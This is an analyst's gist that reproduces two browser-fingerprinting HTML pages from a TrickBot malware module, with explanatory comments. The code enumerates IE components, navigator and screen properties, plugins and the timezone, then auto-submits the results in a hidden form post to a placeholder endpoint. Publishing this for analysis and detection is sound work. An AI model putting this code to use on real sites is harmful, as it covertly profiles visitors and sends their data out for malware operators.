@hasherezade
Created August 1, 2017 17:24
Snippets found in TrickBot module - used for browser fingerprinting
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=10">
<script type="text/javascript">
/*
 * Analyst annotation; the code below is the sample as published, unmodified.
 *
 * Enumerates Internet Explorer component versions through the IE-only
 * clientCaps behavior and stores the result in the form field with id 'data'.
 *
 * Output format: for every component whose version lookup returns a truthy
 * value, two lines are appended:
 *   xie.com.<n>.guid={<GUID>}
 *   xie.com.<n>.version=<version>
 * where <n> is the 1-based position of the GUID in the list below.
 * On any exception the whole result is replaced by the literal 'exept=true'
 * (spelling as in the sample), so partial output is discarded.
 *
 * The fixed strings 'xie.com.' and 'exept=true' are stable content
 * indicators for this snippet.
 *
 * Takes no parameters and returns nothing. i, p and textedit are assigned
 * without a declaration, so they become globals (no 'use strict' is present).
 */
function ahead()
{
var str = new String('');
try{
// Component IDs passed to getComponentVersion() below, in the order that
// defines the <n> index of the output keys.
var components = new Array(
'7790769C-0471-11D2-AF11-00C04FA35D02',
'89820200-ECBD-11CF-8B85-00AA005B4340',
'47F67D00-9E55-11D1-BAEF-00C04FC2D130',
'76C19B38-F0C8-11CF-87CC-0020AFEECF20',
'76C19B34-F0C8-11CF-87CC-0020AFEECF20',
'76C19B33-F0C8-11CF-87CC-0020AFEECF20',
'9381D8F2-0288-11D0-9501-00AA00B911A5',
'4F216970-C90C-11D1-B5C7-0000F8051515',
'283807B5-2C60-11D0-A31D-00AA00B92C03',
'44BBA848-CC51-11CF-AAFA-00AA00B6015C',
'76C19B36-F0C8-11CF-87CC-0020AFEECF20',
'89820200-ECBD-11CF-8B85-00AA005B4383',
'5A8D6EE0-3E18-11D0-821E-444553540000',
'630B1DA0-B465-11D1-9948-00C04F98BBC9',
'08B0E5C0-4FCB-11CF-AAA5-00401C608555',
'45EA75A0-A269-11D1-B5BF-0000F8051515',
'DE5AED00-A4BF-11D1-9948-00C04F98BBC9',
'76C19B30-F0C8-11CF-87CC-0020AFEECF20',
'76C19B31-F0C8-11CF-87CC-0020AFEECF20',
'76C19B50-F0C8-11CF-87CC-0020AFEECF20',
'D27CDB6E-AE6D-11CF-96B8-444553540000',
'2A202491-F00D-11CF-87CC-0020AFEECF20',
// NOTE(review): the next entry contains the letter 'L', which is not a hex
// digit, so it is not a well-formed GUID as printed. Whether that comes from
// the sample itself or from transcription cannot be told from this page.
'5945C046-LE7D-LLDL-BC44-00C04FD912BE',
// The trailing names on the entries below are the sample's own labels; the
// entries above carry none.
'22D6F312-B0F6-11D0-94AB-0080C74C7E95', // 'WinMediaPlayerTrad'
'3AF36230-A269-11D1-B5BF-0000F8051515', // 'OfflineBrwPack'
'44BBA840-CC51-11CF-AAFA-00AA00B6015C', // 'OutlookExpress'
'44BBA842-CC51-11CF-AAFA-00AA00B6015B', // 'NetMeetingNT'
'76C19B32-F0C8-11CF-87CC-0020AFEECF20', // 'PanEuropeanDS'
'76C19B35-F0C8-11CF-87CC-0020AFEECF20', // 'ThaiDS'
'CC2A9BA0-3BDD-11D0-821E-444553540000', // 'TaskScheduler'
'3BF42070-B3B1-11D1-B5C5-0000F8051515', // 'Uniscribe'
'10072CEC-8CC1-11D1-986E-00A0C955B42F', // 'VML'
'76C19B37-F0C8-11CF-87CC-0020AFEECF20', // 'VietnameseDS'
'08B0E5C0-4FCB-11CF-AAA5-00401C608500', // 'MsftVM'
'4F645220-306D-11D2-995D-00C04F98BBC9', // 'VBScripting'
'73FA19D0-2D75-11D2-995D-00C04F98BBC9' // 'WebFolders'
);
// clientCaps is a default DHTML behavior of Internet Explorer. Where
// addBehavior is missing, this call throws and the catch below runs.
document.body.addBehavior('#default#clientCaps');
for (i = 0; i < components.length; i++)
{
// Looks the component up by its ID wrapped in braces.
var ver = document.body.getComponentVersion('{'+components[i]+'}','ComponentID');
// Only components with a truthy version are reported; the rest are skipped,
// so the <n> values in the output can have gaps.
if (ver)
{
p=String(i+1);
str+='xie.com.'+p+'.guid='+'{'+components[i]+'}\n';
str+='xie.com.'+p+'.version='+ver+'\n';
}
}
} catch(e){
// Any failure (including an unsupported behavior) replaces everything
// collected so far with this single marker.
str='exept=true';
}
// Hands the result to the textarea that the page's form posts as 'values'.
textedit = document.getElementById('data');
textedit.value = str;
}
</script>
</head>
<body>
<!-- Analyst note: the form posts the textarea (field name "values") to the
     relative URL "marker_". The literal looks like a placeholder that is
     replaced before the page is used; that substitution is not visible on
     this page, so treat it as an assumption. -->
<form name="frm" action="marker_" method="post">
<textarea id="data" name="values" cols="100" rows="20">
</textarea><br>
<input type="submit" value="send" >
</form>
<!-- Runs as soon as the parser reaches it: ahead() fills the textarea, then
     the form is submitted by script, with no click on the "send" button. -->
<script>ahead();frm.submit()</script>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
/*
 * Analyst annotation; the code below is the sample as published, unmodified.
 *
 * Collects a browser fingerprint as "key = value" text lines and stores it
 * in the form field with id 'data'. In order, it records:
 *   - every property reachable with for...in on navigator and on screen
 *     ("navigator.<prop> = ..." / "screen.<prop> = ...");
 *   - the fixed line "plugins.hide = true", then every for...in property of
 *     each navigator.plugins entry as "plugins.<n>.<attr> = ...", <n> 1-based;
 *   - "timezone = <Date#getTimezoneOffset()>";
 *   - "navigator.javaEnabled()=<value>";
 *   - "xie.ScriptEngineBuildVersion()=<value>", with an empty value when the
 *     user-agent test below does not match.
 * It also sets the hidden form field 'ie' to 'sux' when that test matches.
 *
 * The fixed key names ('plugins.hide = true', 'xie.ScriptEngineBuildVersion()=')
 * and the 'sux' value are stable content indicators for this snippet.
 *
 * Takes no parameters and returns nothing. There is no try/catch, so an
 * exception anywhere in the body propagates to the caller. objs, str, i, val,
 * st and textedit are assigned without a declaration and become globals.
 */
function ahead()
{
// Pairs of [object to walk, prefix used for its keys in the output].
objs = new Array([navigator, "navigator"], [screen, "screen"]);
str = new String("");
for(i = 0; i<objs.length; i++) {
for(var prop in objs[i][0]) {
val = objs[i][0][prop];
// Empty strings are normalised: 0 for screen properties, the two-character
// text "" for everything else. The else belongs to the inner if.
if(val === "")
if(objs[i][1] == "screen") val = 0;
else val = '""';
// Non-null objects are reduced to a marker; everything else, including
// functions (typeof 'function'), goes through String().
if(typeof(val) == 'object' && val != null)
st = "[object]";
else
st = String(val);
// Disabled in the sample: would have stopped walking the current object at
// the first value whose text starts with 'f'.
//if(st[0] == 'f') break;
// Line breaks are removed so each value stays on one output line.
st = st.replace(/\n|\r/g, "");
str += objs[i][1] + "." + prop + " = " + st + "\n";
}
}
//plugins
// Appended unconditionally, whatever the plugin list contains.
str += "plugins.hide = true\n";
var plugN = navigator.plugins.length;
for(i = 0; i < plugN; i++) {
for(var atr in navigator.plugins[i]) {
str += "plugins." + (i + 1) + "." + atr + " = " +
String(navigator.plugins[i][atr]).replace(/\n|\r/g,"") + "\n";
}
}
var d = new Date();
str += "timezone = " + d.getTimezoneOffset() + "\n";
str+='navigator.javaEnabled()='+navigator.javaEnabled().toString()+'\n';
var ua = navigator.userAgent;
// indexOf is case-sensitive and the first literal is lowercase 'msie', so a
// user agent that spells the token in upper case matches only through
// 'Trident'.
var ie = ua.indexOf('msie')>=0 || ua.indexOf('Trident')>=0;
if(ie) {
// Flags the submission through the hidden 'ie' field and adds the JScript
// engine build number (ScriptEngineBuildVersion is a JScript global).
document.getElementById('ie').value = 'sux';
str+='xie.ScriptEngineBuildVersion()='+String(ScriptEngineBuildVersion())+'\n';
} else {
// Same key with an empty value, so the key is present on every submission.
str+='xie.ScriptEngineBuildVersion()=\n';
}
// Hands the result to the textarea that the page's form posts as 'values'.
textedit = document.getElementById("data");
textedit.value = str;
}
</script>
</head>
<body>
<!-- Analyst note: the form posts two fields to the relative URL "marker_":
     "values" (the textarea) and the hidden "ie" field. The "marker_" literal
     looks like a placeholder that is replaced before the page is used; that
     substitution is not visible on this page, so treat it as an assumption. -->
<form name="frm" action="marker_" method="post">
<textarea id="data" name="values" cols="100" rows="20">
</textarea><br>
<input id="ie" name="ie" type="hidden">
<input type="submit" value="send" >
</form>
<!-- Runs as soon as the parser reaches it: ahead() fills the fields, then the
     form is submitted by script, with no click on the "send" button. If
     ahead() throws, the submit() call in the same statement list is not
     reached. -->
<script>ahead();frm.submit()</script>
</body>
</html>